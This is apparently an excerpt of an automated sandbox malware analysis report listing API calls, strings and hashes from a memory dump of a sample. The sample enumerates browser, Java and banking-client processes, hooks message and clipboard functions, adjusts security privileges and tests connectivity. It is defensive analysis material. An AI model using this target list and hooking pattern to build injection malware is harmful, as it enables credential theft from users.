                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F7001
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F7010
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F7013
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F7020
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F7023
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 012F7047
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 012F7059
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 012F7065
                                                                                                                                                                                                              • #680.SHELL32 ref: 012F7074
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\svchost.exe), ref: 012F7090
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\iexplore.exe), ref: 012F70B7
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\java.exe), ref: 012F70CD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\javaw.exe), ref: 012F70E3
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\javaws.exe), ref: 012F70F9
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\opera.exe), ref: 012F710F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\firefox.exe), ref: 012F7125
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\maxthon.exe), ref: 012F713B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\avant.exe), ref: 012F7151
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\mnp.exe), ref: 012F7167
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\safari.exe), ref: 012F717D
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\netscape.exe), ref: 012F7193
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\tbb-firefox.exe), ref: 012F71A9
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\frd.exe), ref: 012F71BF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 012F71D5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 012F71EB
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FB8F0,00000000,00000000,00000000,00000000), ref: 012F7219
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F7233
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F7240
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FEF80,00000000,00000000,00000000), ref: 012F7255
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F7269
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F7276
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01300560,00000000,00000000,00000000), ref: 012F728B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F729F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F72AC
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01300E20,00000000,00000000,00000000), ref: 012F72C1
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F72D5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F72E2
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FF6A0,00000000,00000000,00000000), ref: 012F72F7
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F730B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F7318
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FCB80,00000000,00000000,00000000), ref: 012F732D
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F7341
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F734E
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FCC20,00000000,00000000,00000000), ref: 012F7363
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F7377
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F7384
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01301590,00000000,00000000,00000000), ref: 012F7399
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F73AD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F73BA
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,013024D0,00000000,00000000,00000000), ref: 012F73CF
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F73E3
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F73F0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,013031C0,00000000,00000000,00000000), ref: 012F7405
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F7419
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F7426
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,013032B0,00000000,00000000,00000000), ref: 012F743B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F744F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F745C
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FFE80,00000000,00000000,00000000), ref: 012F7471
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F7485
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F7492
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01303480,00000000,00000000,00000000), ref: 012F74A7
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F74BB
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F74C8
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,013043F0,00000000,00000000,00000000), ref: 012F74DD
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F74F1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F74FE
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,013047D0,00000000,00000000,00000000), ref: 012F7513
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F7527
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F7534
                                                                                                                                                                                                                • Part of subcall function 012F5720: memset.MSVCRT(?,00000000,00000103,774CF550,775B7390,774D0A60), ref: 012F5741
                                                                                                                                                                                                                • Part of subcall function 012F5720: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,774CF550,775B7390,774D0A60), ref: 012F5757
                                                                                                                                                                                                                • Part of subcall function 012F5720: AddVectoredExceptionHandler.KERNEL32(00000001,012E3A20), ref: 012F5764
                                                                                                                                                                                                                • Part of subcall function 012F5720: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 012F577F
                                                                                                                                                                                                                • Part of subcall function 012F5720: CreateThread.KERNEL32(00000000,00000000,012FA7B0,00000000,00000000,00000000), ref: 012F5799
                                                                                                                                                                                                                • Part of subcall function 012F5720: GetHandleInformation.KERNEL32(00000000,?), ref: 012F57B1
                                                                                                                                                                                                                • Part of subcall function 012F5720: CloseHandle.KERNEL32(00000000), ref: 012F57C2
                                                                                                                                                                                                                • Part of subcall function 012F5720: InitializeCriticalSection.KERNEL32(0132FB50), ref: 012F57D3
                                                                                                                                                                                                                • Part of subcall function 012F5720: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 012F57E9
                                                                                                                                                                                                                • Part of subcall function 012F5720: GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 012F57FB
                                                                                                                                                                                                                • Part of subcall function 012F5720: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 012F581A
                                                                                                                                                                                                                • Part of subcall function 012F5720: GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 012F5828
                                                                                                                                                                                                                • Part of subcall function 012F5720: GetProcAddress.KERNEL32(00000000,GetMessageA,00000000,012F42A0,0133A00C), ref: 012F5844
                                                                                                                                                                                                                • Part of subcall function 012F5720: GetProcAddress.KERNEL32(00000000,GetMessageW,00000000,012F43D0,0133A010), ref: 012F5860
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,013019A0,00000000,00000000,00000000), ref: 012F7549
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F755D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F756A
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01301C80,00000000,00000000,00000000), ref: 012F757F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F7593
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F75A0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012E80C0,00000000,00000000,00000000), ref: 012F75B5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F75CD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F75E6
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\isclient.exe), ref: 012F75FD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\ipc_full.exe), ref: 012F7613
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\intpro.exe), ref: 012F7625
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\cbsmain.dll), ref: 012F7637
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\clmain.exe), ref: 012F7649
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\core.exe), ref: 012F765B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\rundll32.exe), ref: 012F766D
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\notepad.exe), ref: 012F767F
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 012F76EC
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 012F76FB
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 012F7714
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 012F771B
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,9e2b3b2da), ref: 012F7731
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012EBC50,00000000,00000000,00000000), ref: 012F7745
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F775D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F776E
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012E7FD0,00000000,00000000,00000000), ref: 012F7783
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F779B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F77AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Create$Thread$Information$Close$Security$Descriptor$AddressProc$HeapProcess$CriticalCurrentFreeInitializeModuleMutexPathSection$#680BackslashCommandConvertFileInfoLibraryLineLoadLocalNameNamedSaclStringVolume_snprintfmemset$DesktopDirectoryEnvironmentExceptionFolderHandlerMultipleObjectObjectsOpenQuerySleepSystemUserValidateValueVariableVectoredWaitWindowslstrcmpi
                                                                                                                                                                                                              • String ID: --no-sandbox$ --no-sandbox$9E2B3C2Da$9E2B3F61a$9e2b3b2da$IsWow64Process$RtlFreeHeap$S:(ML;;NRNWNX;;;LW)$\avant.exe$\cbsmain.dll$\chrome.exe$\clmain.exe$\core.exe$\explorer.exe$\firefox.exe$\frd.exe$\iexplore.exe$\intpro.exe$\ipc_full.exe$\isclient.exe$\java.exe$\javaw.exe$\javaws.exe$\maxthon.exe$\mnp.exe$\netscape.exe$\notepad.exe$\opera.exe$\rundll32.exe$\safari.exe$\svchost.exe$\tbb-firefox.exe$kernel32.dll$ntdll.dll

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Graph image not preserved; it starts at 12f79d0. Legend: Executed / Not Executed.
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012F78A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 012F78B4
                                                                                                                                                                                                                • Part of subcall function 012F78A0: Process32First.KERNEL32(00000000,?,?,00000000), ref: 012F78D9
                                                                                                                                                                                                                • Part of subcall function 012F78A0: GetCurrentProcessId.KERNEL32(?,00000000), ref: 012F78FD
                                                                                                                                                                                                                • Part of subcall function 012F78A0: StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 012F7917
                                                                                                                                                                                                                • Part of subcall function 012F78A0: EnterCriticalSection.KERNEL32(0132FB80,?,00000000), ref: 012F793B
                                                                                                                                                                                                                • Part of subcall function 012F78A0: GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 012F7941
                                                                                                                                                                                                                • Part of subcall function 012F78A0: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 012F7948
                                                                                                                                                                                                                • Part of subcall function 012F78A0: LeaveCriticalSection.KERNEL32(0132FB80,?,00000000), ref: 012F7977
                                                                                                                                                                                                                • Part of subcall function 012F78A0: Process32Next.KERNEL32(00000000,00000128,?,00000000), ref: 012F798B
                                                                                                                                                                                                                • Part of subcall function 012F78A0: GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 012F79A5
                                                                                                                                                                                                                • Part of subcall function 012F78A0: CloseHandle.KERNEL32(00000000,?,00000000), ref: 012F79B6
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 012F7A34
                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 012F7A58
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012F7A82
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F7A94
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0132FB80), ref: 012F7A9F
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0132FB80), ref: 012F7AC4
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 012F7B2B
                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 012F7B4C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012F7B70
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F7B82
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0132FB80), ref: 012F7B8D
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0132FB80), ref: 012F7BB8
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(01305460,?,?), ref: 012F7C06
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(01305460,?,?), ref: 012F7C51
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0132FB80,?,?), ref: 012F7C90
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000010), ref: 012F7C9A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F7CA1
                                                                                                                                                                                                              • Sleep.KERNEL32(00000032), ref: 012F7DB5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalProcessSection$Handle$EnterHeap$CloseInformationLeave$AllocOpenProcess32QueryTimesVirtual$CreateCurrentFirstNextSleepSnapshotToolhelp32
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 87146162-0
                                                                                                                                                                                                              • Opcode ID: e1db2a0ef439dfa01625ce68a9c49ad8638b09057ca12f1777a9758e45b9c4ad
                                                                                                                                                                                                              • Instruction ID: 28bb36c9bb40e487f1c3bd2df85b878010a568dab559314f7fe0f0410f30d4a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1db2a0ef439dfa01625ce68a9c49ad8638b09057ca12f1777a9758e45b9c4ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7C106B16183519FD321DF69C884AABFBE8FB88B10F54892EF689C7245D7709504CF92

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsNetworkAlive.SENSAPI(012E6E0D,00000000), ref: 012F4F93
                                                                                                                                                                                                              • #680.SHELL32 ref: 012F4FA1
                                                                                                                                                                                                              • DnsFlushResolverCache.DNSAPI ref: 012F4FAB
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,00000000,774D0F10), ref: 012F4FC8
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,774D0F10), ref: 012F4FE7
                                                                                                                                                                                                              • StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 012F5000
                                                                                                                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 012F5013
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,?,00000000,774D0F10), ref: 012F502C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,774D0F10), ref: 012F5045
                                                                                                                                                                                                              • StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 012F5058
                                                                                                                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 012F5065
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CheckConnectionInternetlstrcpynmemset$#680AliveCacheFlushNetworkResolver
                                                                                                                                                                                                              • String ID: http://$www.bing.com$www.microsoft.com
                                                                                                                                                                                                              • API String ID: 1332333999-3977723178
                                                                                                                                                                                                              • Opcode ID: 256886b64453d0d708f727780ffe95912f5b9c682aa8ca4c6c73ea9dcb3cfe99
                                                                                                                                                                                                              • Instruction ID: 33f3ae1c9f5d25dbf777ee7442e2c30d211af9a038ec0b3f962d051257f83b14
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 256886b64453d0d708f727780ffe95912f5b9c682aa8ca4c6c73ea9dcb3cfe99
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48219B72A4432967D730EBA9AC41FDAB76C9B54B15F004199F788E61C0DAF196C48BE0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 012F78B4
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?,?,00000000), ref: 012F78D9
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000), ref: 012F78FD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 012F7917
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0132FB80,?,00000000), ref: 012F793B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 012F7941
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 012F7948
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0132FB80,?,00000000), ref: 012F7977
                                                                                                                                                                                                                • Part of subcall function 01304880: OpenProcess.KERNEL32(00000400,00000000,00000000,774CF550,00000000,7765C3F0), ref: 01304895
                                                                                                                                                                                                                • Part of subcall function 01304880: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,?,?,?,012F58B3), ref: 013048AC
                                                                                                                                                                                                                • Part of subcall function 01304880: GetTokenInformation.ADVAPI32(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 013048CA
                                                                                                                                                                                                                • Part of subcall function 01304880: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,012F58B3), ref: 013048E2
                                                                                                                                                                                                                • Part of subcall function 01304880: GetHandleInformation.KERNEL32(?,00000000), ref: 0130493B
                                                                                                                                                                                                                • Part of subcall function 01304880: CloseHandle.KERNEL32(?), ref: 0130494C
                                                                                                                                                                                                                • Part of subcall function 01304880: GetHandleInformation.KERNEL32(00000000,?), ref: 0130495E
                                                                                                                                                                                                                • Part of subcall function 01304880: CloseHandle.KERNEL32(00000000), ref: 0130496F
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128,?,00000000), ref: 012F798B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 012F79A5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 012F79B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex, xrefs: 012F7912
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$InformationProcess$Close$CriticalHeapOpenProcess32SectionToken$AllocCharCreateCurrentEnterFirstLeaveNextSnapshotToolhelp32Upper
                                                                                                                                                                                                              • String ID: iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex
                                                                                                                                                                                                              • API String ID: 3461290786-4199822264
                                                                                                                                                                                                              • Opcode ID: 25954a1f655cd0e8af8b30ed72c4d1fe4de0860055fe6654a06d0d08b9281f2f
                                                                                                                                                                                                              • Instruction ID: 87ea6d87633cb3c682979c7643b7538ca398b0e41457a64dad47aec3b04752ac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25954a1f655cd0e8af8b30ed72c4d1fe4de0860055fe6654a06d0d08b9281f2f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66315E719112169BEB30AF69D848BEEBBBCEF49754F1440ADEA44D3240D7709B41CBA0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32(00000020,00000000,012E358E,75C8DB30,?,?,?,?,012E358E,?,?,012E3751), ref: 01305940
                                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 01305947
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,012E358E,?,?,?,?,012E358E,?,?,012E3751), ref: 01305957
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 0130595E
                                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 01305981
                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(012E358E,00000000,00000001,00000000,00000000,00000000), ref: 0130599B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 013059A5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(012E358E), ref: 013059B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Token$CurrentOpenProcessThread$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID: SeSecurityPrivilege
                                                                                                                                                                                                              • API String ID: 731831024-2333288578
                                                                                                                                                                                                              • Opcode ID: a2ff8a82daf51185cc6e9b43bf447cd53ffc59a53b87dc87568bd52258f99671
                                                                                                                                                                                                              • Instruction ID: 831aa1c3c8a0b3f29cc33722a0901ba06aba005d4dab01594f3f2ca93b7a0115
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2ff8a82daf51185cc6e9b43bf447cd53ffc59a53b87dc87568bd52258f99671
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C113C75641214ABFB30EFA49D1DFAA7BBCEB05B15F108448FA01E6185D6B4AA04CBA1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103444629.0000000001280000.00000040.00000001.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_1280000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                              • Instruction ID: cffe4e9143a532234694e9da3e4d2dcc1baff380730f40fa0903802ed7fa364f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E916171E12216AFDB10EFA8CC40BAEB7B5BF98350F254559E904A73C4D734A912CBA4

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
